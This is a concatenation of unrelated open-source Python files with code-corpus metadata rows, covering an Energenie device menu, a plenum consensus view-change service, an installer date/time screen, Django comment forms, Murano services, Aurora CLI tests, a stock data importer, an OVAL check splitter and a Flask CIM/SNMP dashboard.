print("%d. %s %s" % (i, name, energenie.registry.get(name)))
names.append(name)
i += 1
return names
def get_device_name():
"""Give user a list of devices and choose one from the list"""
names = show_registry()
try:
while True:
i = readin("Which device %s to %s? " % (1, len(names)))
try:
device_index = int(i)
if device_index < 1 or device_index > len(names):
print("Choose a number between %s and %s" % (1, len(names)))
else:
break # got it
except ValueError:
print("Must enter a number")
except KeyboardInterrupt:
return None # nothing chosen, user aborted
name = names[device_index-1]
print("selected: %s" % name)
return name
#===== ACTION ROUTINES ========================================================
def do_legacy_learn():
"""Repeatedly broadcast a legacy switch message, so you can learn a socket to the pattern"""
# get device
house_code = get_house_code()
device_index = get_device_index()
# Use a MiHomeLight as it has the longest TX time
device = energenie.Devices.MIHO008((house_code, device_index))
# in a loop until Ctrl-C
print("Legacy learn broadcasting, Ctrl-C to stop")
try:
while True:
print("ON")
device.turn_on()
time.sleep(0.5)
print("OFF")
device.turn_off()
time.sleep(0.5)
except KeyboardInterrupt:
pass # user exit
def do_mihome_discovery():
"""Discover any mihome device when it sends reports"""
print("Discovery mode, press Ctrl-C to stop")
energenie.discovery_ask(energenie.ask)
try:
while True:
energenie.loop() # Allow receive processing
time.sleep(0.25) # tick fast enough to get messages in quite quickly
except KeyboardInterrupt:
print("Discovery stopped")
def do_list_registry():
"""List the entries in the registry"""
print("REGISTRY:")
show_registry()
energenie.registry.fsk_router.list()
def do_switch_device():
"""Turn the switch on a socket on and off, to test it"""
global quit
name = get_device_name()
device = energenie.registry.get(name)
def on():
print("Turning on")
device.turn_on()
def off():
print("Turning off")
device.turn_off()
MENU = [
("on", on),
("off", off)
]
try:
while not quit:
show_menu(MENU)
choice = get_choice((1,len(MENU)))
if choice != None:
handle_choice(MENU, choice)
except KeyboardInterrupt:
pass # user exit
quit = False
def do_show_device_status():
"""Show the readings associated with a device"""
name = get_device_name()
device = energenie.registry.get(name)
readings = device.get_readings_summary()
print(readings)
def do_watch_devices():
"""Repeatedly show readings for all devices"""
print("Watching devices, Ctrl-C to stop")
try:
while True:
energenie.loop() # allow receive processing
print('-' * 80)
names = energenie.registry.names()
for name in names:
device = energenie.registry.get(name)
readings = device.get_readings_summary()
print("%s %s" % (name, readings))
print("")
time.sleep(1)
except KeyboardInterrupt:
pass # user exit
def do_rename_device():
"""Rename a device in the registry to a different name"""
# This is useful when turning auto discovered names into your own names
old_name = get_device_name()
if old_name == None: return # user abort
try:
new_name = readin("New name? ")
except KeyboardInterrupt:
return # user abort
energenie.registry.rename(old_name, new_name)
print("Renamed OK")
def do_delete_device():
"""Delete a device from the registry so it is no longer recognised"""
name = get_device_name()
if name == None: return #user abort
energenie.registry.delete(name)
print("Deleted OK")
def do_logging():
"""Enter a mode where all communications are logged to screen and a file"""
import Logger
# provide a default incoming message handler for all fsk messages
def incoming(address, message):
print("\nIncoming from %s" % str(address))
print(message)
Logger.logMessage(message)
energenie.fsk_router.when_incoming(incoming)
print("Logging enabled, Ctrl-C to stop")
try:
while True:
energenie.loop()
except KeyboardInterrupt:
pass #user quit
finally:
energenie.fsk_router.when_incoming(None)
def do_quit():
"""Finished with the program, so exit"""
global quit
quit = True
#===== MENU ===================================================================
def show_menu(menu):
"""Display a menu on the console"""
i = 1
for item in menu:
print("%d. %s" % (i, item[0]))
i += 1
def get_choice(choices):
"""Get and validate a numberic choice from the tuple choices(first, last)"""
first = choices[0]
last = choices[1]
try:
while True:
choice = readin("Choose %d to %d? " % (first, last))
try:
choice = int(choice)
if choice < first or choice > last:
print("Must enter a number between %d and %d" % (first, last))
else:
return choice
except ValueError:
print("Must enter a number")
except KeyboardInterrupt:
do_quit()
def handle_choice(menu, choice):
"""Route to the handler for the given menu choice"""
menu[choice-1][1]()
MAIN_MENU = [
("legacy learn mode", do_legacy_learn),
("mihome discovery mode", do_mihome_discovery),
("list registry", do_list_registry),
("switch device", do_switch_device),
("show device status", do_show_device_status),
("watch devices", do_watch_devices),
("rename device", do_rename_device),
("delete device", do_delete_device),
("logging", do_logging),
("quit", do_quit)
]
#===== MAIN PROGRAM ===========================================================
def setup_tool():
"""The main program loop"""
while not quit:
print("\nMAIN MENU")
show_menu(MAIN_MENU)
choice = get_choice((1,len(MAIN_MENU)))
if not quit:
print("\n")
handle_choice(MAIN_MENU, choice)
if __name__ == "__main__":
energenie.init()
try:
setup_tool()
finally:
energenie.finished()
# END
| mit | -7,787,318,702,676,229,000 | 23.235795 | 96 | 0.553745 | false | 3.988312 | false | false | false |
evernym/zeno | plenum/server/consensus/view_change_trigger_service.py | 2 | 7315 | from typing import Callable
from plenum.common.config_util import getConfig
from plenum.common.constants import NODE_STATUS_DB_LABEL, VIEW_CHANGE_PREFIX
from plenum.common.event_bus import InternalBus, ExternalBus
from plenum.common.messages.internal_messages import VoteForViewChange, NodeNeedViewChange, NewViewAccepted
from plenum.common.messages.node_messages import InstanceChange
from plenum.common.metrics_collector import MetricsCollector, NullMetricsCollector
from plenum.common.router import Subscription
from plenum.common.stashing_router import StashingRouter, DISCARD
from plenum.common.timer import TimerService
from plenum.server.consensus.consensus_shared_data import ConsensusSharedData
from plenum.server.consensus.utils import replica_name_to_node_name
from plenum.server.database_manager import DatabaseManager
from plenum.server.replica_validator_enums import STASH_CATCH_UP, CATCHING_UP
from plenum.server.suspicion_codes import Suspicions, Suspicion
from plenum.server.view_change.instance_change_provider import InstanceChangeProvider
from stp_core.common.log import getlogger
logger = getlogger()
class ViewChangeTriggerService:
def __init__(self,
data: ConsensusSharedData,
timer: TimerService,
bus: InternalBus,
network: ExternalBus,
db_manager: DatabaseManager,
stasher: StashingRouter,
is_master_degraded: Callable[[], bool],
metrics: MetricsCollector = NullMetricsCollector()):
self._data = data
self._timer = timer
self._bus = bus
self._network = network
self._stasher = stasher
self._is_master_degraded = is_master_degraded
self.metrics = metrics
self._config = getConfig()
self._instance_changes = \
InstanceChangeProvider(outdated_ic_interval=self._config.OUTDATED_INSTANCE_CHANGES_CHECK_INTERVAL,
node_status_db=db_manager.get_store(NODE_STATUS_DB_LABEL),
time_provider=timer.get_current_time)
self._subscription = Subscription()
self._subscription.subscribe(bus, VoteForViewChange, self.process_vote_for_view_change)
self._subscription.subscribe(bus, NewViewAccepted, self.process_new_view_accepted)
self._subscription.subscribe(stasher, InstanceChange, self.process_instance_change)
def cleanup(self):
self._subscription.unsubscribe_all()
@property
def name(self):
return replica_name_to_node_name(self._data.name)
def __repr__(self):
return self.name
def process_vote_for_view_change(self, msg: VoteForViewChange):
proposed_view_no = self._data.view_no
# TODO: Some time ago it was proposed that view_no should not be increased during proposal
# if view change is already in progress, unless suspicion code is "view change is taking too long".
# Idea was to improve stability of view change triggering, however for some reason this change lead
# to lots of failing/flaky tests. This still needs to be investigated.
# if suspicion == Suspicions.INSTANCE_CHANGE_TIMEOUT or not self.view_change_in_progress:
if msg.suspicion != Suspicions.STATE_SIGS_ARE_NOT_UPDATED or not self._data.waiting_for_new_view:
proposed_view_no += 1
if msg.view_no is not None:
proposed_view_no = msg.view_no
self._send_instance_change(proposed_view_no, msg.suspicion)
def process_instance_change(self, msg: InstanceChange, frm: str):
frm = replica_name_to_node_name(frm)
# TODO: Do we really need this?
if frm not in self._network.connecteds:
return DISCARD, "instance change request: {} from {} which is not in connected list: {}".\
format(msg, frm, self._network.connecteds)
if not self._data.is_participating:
return STASH_CATCH_UP, CATCHING_UP
logger.info("{} received instance change request: {} from {}".format(self, msg, frm))
if msg.viewNo <= self._data.view_no:
return DISCARD, "instance change request with view no {} which is not more than its view no {}".\
format(msg.viewNo, self._data.view_no)
# Record instance changes for views but send instance change
# only when found master to be degraded. if quorum of view changes
# found then change view even if master not degraded
self._on_verified_instance_change_msg(msg, frm)
if self._instance_changes.has_inst_chng_from(msg.viewNo, self.name):
logger.info("{} received instance change message {} "
"but has already sent an instance change message".format(self, msg))
elif not self._is_master_degraded():
logger.info("{} received instance change message {} "
"but did not find the master to be slow".format(self, msg))
else:
logger.display("{}{} found master degraded after "
"receiving instance change message from {}".format(VIEW_CHANGE_PREFIX, self, frm))
self._send_instance_change(msg.viewNo, Suspicions.PRIMARY_DEGRADED)
def process_new_view_accepted(self, msg: NewViewAccepted):
self._instance_changes.remove_view(self._data.view_no)
def _send_instance_change(self, view_no: int, suspicion: Suspicion):
logger.info("{}{} sending an instance change with view_no {} since {}".
format(VIEW_CHANGE_PREFIX, self, view_no, suspicion.reason))
msg = InstanceChange(view_no, suspicion.code)
self._network.send(msg)
# record instance change vote for self and try to change the view if quorum is reached
self._on_verified_instance_change_msg(msg, self.name)
def _on_verified_instance_change_msg(self, msg: InstanceChange, frm: str):
view_no = msg.viewNo
if not self._instance_changes.has_inst_chng_from(view_no, frm):
self._instance_changes.add_vote(msg, frm)
if view_no > self._data.view_no:
self._try_start_view_change_by_instance_change(view_no)
def _try_start_view_change_by_instance_change(self, proposed_view_no: int) -> bool:
# TODO: Need to handle skewed distributions which can arise due to
# malicious nodes sending messages early on
can, why_not = self._can_view_change(proposed_view_no)
if can:
logger.display("{}{} initiating a view change to {} from {}".
format(VIEW_CHANGE_PREFIX, self, proposed_view_no, self._data.view_no))
self._bus.send(NodeNeedViewChange(view_no=proposed_view_no))
else:
logger.info(why_not)
return can
def _can_view_change(self, proposed_view_no: int) -> (bool, str):
quorum = self._data.quorums.view_change.value
if not self._instance_changes.has_quorum(proposed_view_no, quorum):
return False, '{} has no quorum for view {}'.format(self, proposed_view_no)
if not proposed_view_no > self._data.view_no:
return False, '{} is in higher view more than {}'.format(self, proposed_view_no)
return True, ''
| apache-2.0 | 5,930,155,047,965,912,000 | 49.10274 | 110 | 0.662064 | false | 3.847975 | false | false | false |
akuster/yali | yali/gui/ScrDateTime.py | 1 | 8166 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2008-2010 TUBITAK/UEKAE
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
#
# Please read the COPYING file.
#
import gettext
_ = gettext.translation('yali', fallback=True).ugettext
from PyQt4.Qt import QWidget, SIGNAL, QTimer, QDate, QComboBox, QTime
from pds.thread import PThread
from pds.gui import PMessageBox, MIDCENTER, CURRENT, OUT
import yali.localedata
import yali.context as ctx
import yali.postinstall
import yali.storage
from yali.gui import ScreenWidget
from yali.gui.Ui.datetimewidget import Ui_DateTimeWidget
from yali.timezone import TimeZoneList
class Widget(QWidget, ScreenWidget):
name = "timeSetup"
def __init__(self):
QWidget.__init__(self)
self.ui = Ui_DateTimeWidget()
self.ui.setupUi(self)
self.timer = QTimer(self)
self.from_time_updater = True
self.is_date_changed = False
self.current_zone = ""
self.tz_dict = {}
self.continents = []
self.countries = []
for country, data in yali.localedata.locales.items():
if country == ctx.consts.lang:
if data.has_key("timezone"):
ctx.installData.timezone = data["timezone"]
# Append continents and countries the time zone dictionary
self.createTZDictionary()
# Sort continent list
self.sortContinents()
# Append sorted continents to combobox
self.loadContinents()
# Load current continents country list
self.getCountries(self.current_zone["continent"])
# Highlight the current zone
self.index = self.ui.continentList.findText(self.current_zone["continent"])
self.ui.continentList.setCurrentIndex(self.index)
self.index = self.ui.countryList.findText(self.current_zone["country"])
self.ui.countryList.setCurrentIndex(self.index)
# Initialize widget signal and slots
self.__initSignals__()
self.ui.calendarWidget.setDate(QDate.currentDate())
self.pthread = None
self.pds_messagebox = PMessageBox(self)
self.pds_messagebox.enableOverlay()
self.timer.start(1000)
def __initSignals__(self):
self.connect(self.ui.timeEdit, SIGNAL("timeChanged(QTime)"), self.timerStop)
self.connect(self.ui.calendarWidget, SIGNAL("selectionChanged()"), self.dateChanged)
self.connect(self.timer, SIGNAL("timeout()"), self.updateClock)
self.connect(self.ui.continentList, SIGNAL("activated(QString)"), self.getCountries)
def createTZDictionary(self):
tz = TimeZoneList()
zones = [ x.timeZone for x in tz.getEntries() ]
zones.sort()
for zone in zones:
split = zone.split("/")
# Human readable continent names
continent_pretty_name = split[0].replace("_", " ")
continent_pretty_name = continent_pretty_name
# Some country names can be like Argentina/Catamarca so this fixes the splitting problem
# caused by zone.split("/")
#
# Remove continent info and take the rest as the country name
split.pop(0)
country_pretty_name = " / ".join(split)
# Human readable country names
country_pretty_name = country_pretty_name.replace("_", " ")
# Get current zone
if zone == ctx.installData.timezone:
self.current_zone = { "continent":continent_pretty_name, "country":country_pretty_name}
# Append to dictionary
if self.tz_dict.has_key(continent_pretty_name):
self.tz_dict[continent_pretty_name].append([country_pretty_name, zone])
else:
self.tz_dict[continent_pretty_name] = [[country_pretty_name, zone]]
def sortContinents(self):
for continent in self.tz_dict.keys():
self.continents.append(continent)
self.continents.sort()
def loadContinents(self):
for continent in self.continents:
self.ui.continentList.addItem(continent)
def getCountries(self, continent):
# Countries of the selected continent
countries = self.tz_dict[str(continent)]
self.ui.countryList.clear()
for country, zone in countries:
self.ui.countryList.addItem(country, zone)
self.countries.append(country)
def dateChanged(self):
self.is_date_changed = True
def timerStop(self):
if self.from_time_updater:
return
# Human action detected; stop the timer.
self.timer.stop()
def updateClock(self):
# What time is it ?
cur = QTime.currentTime()
self.from_time_updater = True
self.ui.timeEdit.setTime(cur)
self.from_time_updater = False
def shown(self):
self.timer.start(1000)
if ctx.flags.install_type == ctx.STEP_BASE:
self.pthread = PThread(self, self.startInit, self.dummy)
def dummy(self):
pass
def setTime(self):
ctx.interface.informationWindow.update(_("Adjusting time settings"))
date = self.ui.calendarWidget.date()
time = self.ui.timeEdit.time()
args = "%02d%02d%02d%02d%04d.%02d" % (date.month(), date.day(),
time.hour(), time.minute(),
date.year(), time.second())
# Set current date and time
ctx.logger.debug("Date/Time setting to %s" % args)
yali.util.run_batch("date", [args])
# Sync date time with hardware
ctx.logger.debug("YALI's time is syncing with the system.")
yali.util.run_batch("hwclock", ["--systohc"])
ctx.interface.informationWindow.hide()
def execute(self):
if not self.timer.isActive() or self.is_date_changed:
QTimer.singleShot(500, self.setTime)
self.timer.stop()
index = self.ui.countryList.currentIndex()
ctx.installData.timezone = self.ui.countryList.itemData(index).toString()
ctx.logger.debug("Time zone selected as %s " % ctx.installData.timezone)
if ctx.flags.install_type == ctx.STEP_BASE:
#FIXME:Refactor hacky code
ctx.installData.rootPassword = ctx.consts.default_password
ctx.installData.hostName = yali.util.product_release()
if ctx.storageInitialized:
disks = filter(lambda d: not d.format.hidden, ctx.storage.disks)
if len(disks) == 1:
ctx.storage.clearPartDisks = [disks[0].name]
ctx.mainScreen.step_increment = 2
else:
ctx.mainScreen.step_increment = 1
return True
else:
self.pds_messagebox.setMessage(_("Storage Devices initialising..."))
self.pds_messagebox.animate(start=MIDCENTER, stop=MIDCENTER)
ctx.mainScreen.step_increment = 0
self.pthread.start()
QTimer.singleShot(2, self.startStorageInitialize)
return False
return True
def startInit(self):
self.pds_messagebox.animate(start=MIDCENTER, stop=MIDCENTER)
def startStorageInitialize(self):
ctx.storageInitialized = yali.storage.initialize(ctx.storage, ctx.interface)
self.initFinished()
def initFinished(self):
self.pds_messagebox.animate(start=CURRENT, stop=CURRENT, direction=OUT)
disks = filter(lambda d: not d.format.hidden, ctx.storage.disks)
if ctx.storageInitialized:
if len(disks) == 1:
ctx.storage.clearPartDisks = [disks[0].name]
ctx.mainScreen.step_increment = 2
else:
ctx.mainScreen.step_increment = 1
ctx.mainScreen.slotNext(dry_run=True)
else:
ctx.mainScreen.enableBack()
| gpl-2.0 | -7,855,595,690,134,043,000 | 33.744681 | 103 | 0.615064 | false | 3.97517 | false | false | false |
ella/ella-comments | ella_comments/forms.py | 1 | 1988 | from django.contrib.contenttypes.models import ContentType
from django.utils.encoding import force_unicode
from django.conf import settings
from ella.utils.timezone import now
from threadedcomments.forms import ThreadedCommentForm
class AuthorizedCommentForm(ThreadedCommentForm):
user = None
def __init__(self, *args, **kwargs):
"there is no such thing as user_name, user_email, user_url"
super(AuthorizedCommentForm, self).__init__(*args, **kwargs)
self.fields.pop('name')
self.fields.pop('email')
self.fields.pop('url')
def check_for_duplicate_comment(self, new):
"""
copy paste of check_for_duplicate_comment from ``django.contrib.comments.forms``
so we can let the decision of which db to use on router
"""
possible_duplicates = self.get_comment_model()._default_manager.filter(
content_type = new.content_type,
object_pk = new.object_pk,
user_name = new.user_name,
user_email = new.user_email,
user_url = new.user_url,
)
for old in possible_duplicates:
if old.submit_date.date() == new.submit_date.date() and old.comment == new.comment:
return old
return new
def get_comment_create_data(self):
"so remove it from comment create date"
return dict(
parent_id = self.cleaned_data['parent'],
title = self.cleaned_data['title'],
content_type = ContentType.objects.get_for_model(self.target_object),
object_pk = force_unicode(self.target_object._get_pk_val()),
user_name = self.user.get_full_name() or self.user.username,
user_email = self.user.email,
comment = self.cleaned_data["comment"],
submit_date = now(),
site_id = settings.SITE_ID,
is_public = True,
is_removed = False,
)
| bsd-3-clause | -4,359,619,489,563,180,500 | 36.509434 | 95 | 0.600604 | false | 4.016162 | false | false | false |
chenyujie/hybrid-murano | murano/db/services/core_services.py | 1 | 8760 | # Copyright (c) 2013 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import types
from oslo_utils import timeutils
from webob import exc
from murano.common.i18n import _
from murano.common import utils
from murano.db.services import environment_templates as env_temp
from murano.db.services import environments as envs
from murano.openstack.common import log as logging
LOG = logging.getLogger(__name__)
class CoreServices(object):
@staticmethod
def get_service_status(environment_id, service_id):
"""Service can have one of three distinguished statuses:
- Deploying: if environment has status deploying and there is at least
one orchestration engine report for this service;
- Pending: if environment has status `deploying` and there is no
report from orchestration engine about this service;
- Ready: If environment has status ready.
:param environment_id: Service environment, we always know to which
environment service belongs to
:param service_id: Id of service for which we checking status.
:return: Service status
"""
# Now we assume that service has same status as environment.
# TODO(ruhe): implement as designed and described above
return envs.EnvironmentServices.get_status(environment_id)
@staticmethod
def get_data(environment_id, path, session_id=None):
get_description = envs.EnvironmentServices.get_environment_description
env_description = get_description(environment_id, session_id)
if env_description is None:
return None
if 'services' not in env_description:
return []
result = utils.TraverseHelper.get(path, env_description)
if path == '/services':
get_status = CoreServices.get_service_status
for srv in result:
srv['?']['status'] = get_status(environment_id, srv['?']['id'])
return result
@staticmethod
def get_template_data(env_template_id, path):
"""It obtains the data for the template. It includes
all the services. In case the path includes information
such as the env_template_id, the information provided will
be related to the entity specified in the path
:param env_template_id: The env_template_id to obtain the data
:param path: Id of service for which we checking status.
:return: The template description
"""
temp_description = env_temp.EnvTemplateServices.\
get_description(env_template_id)
if temp_description is None:
return None
if 'services' not in temp_description:
return []
result = utils.TraverseHelper.get(path, temp_description)
if result is None:
msg = _('Environment Template <EnvId {0}> is not found').format(
env_template_id)
LOG.error(msg)
raise exc.HTTPNotFound(explanation=msg)
return result
@staticmethod
def post_env_template_data(env_template_id, data, path):
"""It stores the template data inside the template
description.
:param env_template_id: The env_template_id to obtain the data
:param data: the template description
:param path: Id of service for which we checking status.
:return: The template description
"""
get_description = env_temp.EnvTemplateServices.get_description
save_description = env_temp.EnvTemplateServices.save_description
temp_description = get_description(env_template_id)
if temp_description is None:
msg = _('Environment Template <EnvId {0}> is not found').format(
env_template_id)
LOG.error(msg)
raise exc.HTTPNotFound(explanation=msg)
if 'services' not in temp_description:
temp_description['services'] = []
if path == '/services':
if isinstance(data, types.ListType):
utils.TraverseHelper.extend(path, data, temp_description)
else:
utils.TraverseHelper.insert(path, data, temp_description)
save_description(temp_description)
return data
@staticmethod
def post_application_data(env_template_id, data, path):
"""It stores the application data inside the template
description.
:param env_template_id: The env_template_id to obtain the data
:param data: the template description
:param path: Id of service for which we checking status.
:return: The template description
"""
get_description = env_temp.EnvTemplateServices.get_description
save_description = env_temp.EnvTemplateServices.save_description
temp_description = get_description(env_template_id)
if temp_description is None:
msg = _('Environment Template <EnvId {0}> is not found').format(
env_template_id)
LOG.error(msg)
raise exc.HTTPNotFound(explanation=msg)
if 'services' not in temp_description:
temp_description['services'] = []
if path == '/services':
if isinstance(data, types.ListType):
utils.TraverseHelper.extend(path, data, temp_description)
else:
utils.TraverseHelper.insert(path, data, temp_description)
save_description(temp_description, env_template_id)
return data
@staticmethod
def post_data(environment_id, session_id, data, path):
get_description = envs.EnvironmentServices.get_environment_description
save_description = envs.EnvironmentServices.\
save_environment_description
env_description = get_description(environment_id, session_id)
if env_description is None:
msg = _('Environment <EnvId {0}> is not found').format(
environment_id)
LOG.error(msg)
raise exc.HTTPNotFound(explanation=msg)
if 'services' not in env_description:
env_description['services'] = []
if path == '/services':
if isinstance(data, types.ListType):
utils.TraverseHelper.extend(path, data, env_description)
else:
utils.TraverseHelper.insert(path, data, env_description)
save_description(session_id, env_description)
return data
@staticmethod
def put_data(environment_id, session_id, data, path):
get_description = envs.EnvironmentServices.get_environment_description
save_description = envs.EnvironmentServices.\
save_environment_description
env_description = get_description(environment_id, session_id)
utils.TraverseHelper.update(path, data, env_description)
env_description['?']['updated'] = str(timeutils.utcnow())
save_description(session_id, env_description)
return data
@staticmethod
def delete_data(environment_id, session_id, path):
get_description = envs.EnvironmentServices.get_environment_description
save_description = envs.EnvironmentServices.\
save_environment_description
env_description = get_description(environment_id, session_id)
utils.TraverseHelper.remove(path, env_description)
save_description(session_id, env_description)
@staticmethod
def delete_env_template_data(env_template_id, path):
"""It deletes a template.
:param env_template_id: The env_template_id to be deleted.
:param path: The path to check.
"""
get_description = env_temp.EnvTemplateServices.get_description
save_description = env_temp.EnvTemplateServices.save_description
tmp_description = get_description(env_template_id)
if tmp_description is None:
msg = _('Environment Template <EnvId {0}> is not found').format(
env_template_id)
LOG.error(msg)
raise exc.HTTPNotFound(explanation=msg)
utils.TraverseHelper.remove(path, tmp_description)
save_description(tmp_description, env_template_id)
| apache-2.0 | 3,541,658,079,617,387,000 | 37.086957 | 79 | 0.651826 | false | 4.43769 | false | false | false |
thinker0/aurora | src/test/python/apache/aurora/client/cli/test_config_noun.py | 8 | 3071 | #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import textwrap
from mock import patch
from twitter.common.contextutil import temporary_file
from apache.aurora.client.cli import EXIT_COMMAND_FAILURE
from apache.aurora.client.cli.client import AuroraCommandLine
from .util import AuroraClientCommandTest, FakeAuroraCommandContext
class TestClientCreateCommand(AuroraClientCommandTest):
def test_list_configs(self):
mock_context = FakeAuroraCommandContext()
with patch('apache.aurora.client.cli.config.ConfigNoun.create_context',
return_value=mock_context):
with temporary_file() as fp:
fp.write(self.get_valid_config())
fp.flush()
cmd = AuroraCommandLine()
cmd.execute(['config', 'list', fp.name])
assert mock_context.out == ['jobs=[west/bozo/test/hello]']
assert mock_context.err == []
def test_list_configs_invalid(self):
mock_context = FakeAuroraCommandContext()
with patch('apache.aurora.client.cli.config.ConfigNoun.create_context',
return_value=mock_context):
with temporary_file() as fp:
fp.write(self.get_invalid_config("blather=..."))
fp.flush()
cmd = AuroraCommandLine()
result = cmd.execute(['config', 'list', fp.name])
assert result == EXIT_COMMAND_FAILURE
assert mock_context.out == []
assert any(line.startswith("Error loading configuration file: invalid syntax") for line in
mock_context.err)
def get_config_with_no_jobs(self):
return textwrap.dedent("""
HELLO_WORLD = Job(
name = '%(job)s',
role = '%(role)s',
cluster = '%(cluster)s',
environment = '%(env)s',
instances = 20,
update_config = UpdateConfig(
batch_size = 5,
watch_secs = 10,
max_per_shard_failures = 2,
),
task = Task(
name = 'test',
processes = [Process(name = 'hello_world', cmdline = 'echo {{thermos.ports[http]}}')],
resources = Resources(cpu = 0.1, ram = 64 * MB, disk = 64 * MB),
)
)
""")
def test_list_configs_nojobs(self):
mock_context = FakeAuroraCommandContext()
with patch('apache.aurora.client.cli.config.ConfigNoun.create_context',
return_value=mock_context):
with temporary_file() as fp:
fp.write(self.get_config_with_no_jobs())
fp.flush()
cmd = AuroraCommandLine()
cmd.execute(['config', 'list', fp.name])
assert mock_context.out == ["jobs=[]"]
assert mock_context.err == []
| apache-2.0 | -1,368,451,864,984,185,300 | 35.129412 | 98 | 0.648323 | false | 3.758874 | true | false | false |
azylstra/StockDB | run.py | 1 | 1191 | #!/usr/bin/python3
# Run the regular daily import of data, with error logging
#
# Author: Alex Zylstra
# Date: 2014/05/17
# License: MIT
from DB import DB, FILE
from scripts import *
from fetch import *
import datetime
import logging
logging.basicConfig(filename='StockDB.log',level=logging.INFO)
import smtplib
def run():
"""Run the daily data import."""
errors = add_all_to_db()
for err in errors:
logging.error("Error: {0}".format(err))
# Attempt to email:
try:
dt = datetime.date.today()
date = str(dt.year) + '-' + str(dt.month) + '-' + str(dt.day)
fromaddr = '[email protected]'
toaddrs = '[email protected]'.split()
# Construct the message
subject = "StockDB report"
body = 'Date: ' + date + '\n'
body += 'Number of errors: ' + str(len(errors)) + '\n\n'
for err in errors:
body += "Error: {0}".format(err) + '\n'
msg = 'Subject: %s\n\n%s' % (subject, body)
server = smtplib.SMTP('localhost')
server.sendmail(fromaddr, toaddrs, msg)
server.quit()
except Exception as err:
logging.error("Error: {0}".format(err))
run() | mit | 954,289,888,926,774,900 | 26.090909 | 69 | 0.5911 | false | 3.326816 | false | false | false |
mpalmi/clip | packages/scap-security-guide/scap-security-guide-0.1.25/shared/modules/splitchecks_module.py | 4 | 3741 | #!/usr/bin/python
import sys
import os
import errno
import string
import re
from optparse import OptionParser
import lxml.etree as ET
xmlns = {
"o": "http://oval.mitre.org/XMLSchema/oval-definitions-5",
"xsi": "http://www.w3.org/2001/XMLSchema-instance",
"oval": "http://oval.mitre.org/XMLSchema/oval-common-5",
"unix": "http://oval.mitre.org/XMLSchema/oval-definitions-5#unix",
"linux": "http://oval.mitre.org/XMLSchema/oval-definitions-5#linux",
"ind": "http://oval.mitre.org/XMLSchema/oval-definitions-5#independent",
}
def parse_options():
usage = "usage: %prog [options] input_file [input_file . . .]"
parser = OptionParser(usage=usage, version="%prog ")
parser.add_option("-o", dest="out_dname", default="/tmp/checks",
help="name of output directory. If unspecified, default is a new directory \"/tmp/checks\"")
(options, args) = parser.parse_args()
if len(args) < 1:
parser.print_help()
sys.exit(1)
return (options, args)
# look for any occurrences of these attributes, and then gather the node
# referenced
def gather_refs(element, defn):
items_with_refs = element.findall(".//*[@test_ref]")
items_with_refs.extend(element.findall(".//*[@var_ref]"))
items_with_refs.extend(element.findall(".//*[@state_ref]"))
items_with_refs.extend(element.findall(".//*[@object_ref]"))
for item in items_with_refs:
for attr in item.attrib.keys():
if attr.endswith("_ref"):
ident = item.get(attr)
referenced_item = id_element_map[ident]
if referenced_item not in def_reflist_map[defn]:
def_reflist_map[defn].append(referenced_item)
gather_refs(referenced_item, defn)
def gather_refs_for_defs(tree):
defn_elements = tree.getiterator("{" + xmlns["o"] + "}definition")
# initialize dictionary, which maps definitions to a list of those things
# it references
for defn in defn_elements:
def_reflist_map[defn] = []
for defn in defn_elements:
gather_refs(defn, defn)
def output_checks(dname):
try:
os.makedirs(dname)
except OSError, e:
if e.errno != errno.EEXIST:
raise
# use namespace prefix-to-uri defined above, to provide abbreviations
for prefix, uri in xmlns.iteritems():
ET.register_namespace(prefix, uri)
os.chdir(dname)
for defn, reflist in def_reflist_map.iteritems():
# create filename from id attribute, get rid of punctuation
fname = defn.get("id")
fname = fname.translate(string.maketrans("", ""),
string.punctuation) + ".xml"
# output definition, and then all elements that the definition
# references
outstring = ET.tostring(defn)
for ref in reflist:
outstring = outstring + ET.tostring(ref)
with open(fname, 'w+') as xml_file:
# giant kludge: get rid of per-node namespace attributes
outstring = re.sub(r"\s+xmlns[^\s]+ ", " ", outstring)
xml_file.write("<def-group>\n" + outstring + "</def-group>")
return
def gather_ids_for_elements(tree):
for element in tree.findall(".//*[@id]"):
id_element_map[element.get("id")] = element
id_element_map = {} # map of ids to elements
def_reflist_map = {} # map of definitions to lists of elements it references
def main():
(options, args) = parse_options()
for fname in args:
tree = ET.parse(fname)
# ET.dump(tree)
gather_ids_for_elements(tree)
gather_refs_for_defs(tree)
output_checks(options.out_dname)
sys.exit(0)
if __name__ == "__main__":
main()
| apache-2.0 | 9,097,986,886,495,331,000 | 33.962617 | 114 | 0.616947 | false | 3.552707 | false | false | false |
AdrianEriksen/ttm4128 | app.py | 1 | 1126 | from cim_client import CIMClient
from snmp_client import SNMPClient
from flask import Flask, redirect, render_template, url_for
# Initiate Flask
app = Flask(__name__)
# Frontpage method redirecting to CIM dashboard
@app.route("/")
def index():
return redirect(url_for('cim_dashboard'))
# CIM dashboard method
@app.route("/cim")
def cim_dashboard():
client = CIMClient()
try:
os_info = client.get_os_info()
except:
os_info = 'not availible'
try:
ip_interfaces = client.get_ip_interfaces()
except:
ip_interfaces = []
return render_template('cim.html',
os_info=os_info, ip_interfaces=ip_interfaces)
# SNMP dashboard method
@app.route("/snmp")
def snmp_dashboard():
snmp = SNMPClient()
try:
os_info = snmp.getOs()
except:
os_info = "Host not availible"
try:
ip_interfaces = snmp.getNetwork()
except:
ip_interfaces = []
return render_template('snmp.html',
os_info=os_info, ip_interfaces=ip_interfaces)#, url_for=url_for())
# Run the server
if __name__ == "__main__":
app.run()
| mit | 5,498,000,740,435,371,000 | 21.979592 | 74 | 0.622558 | false | 3.401813 | false | false | false |
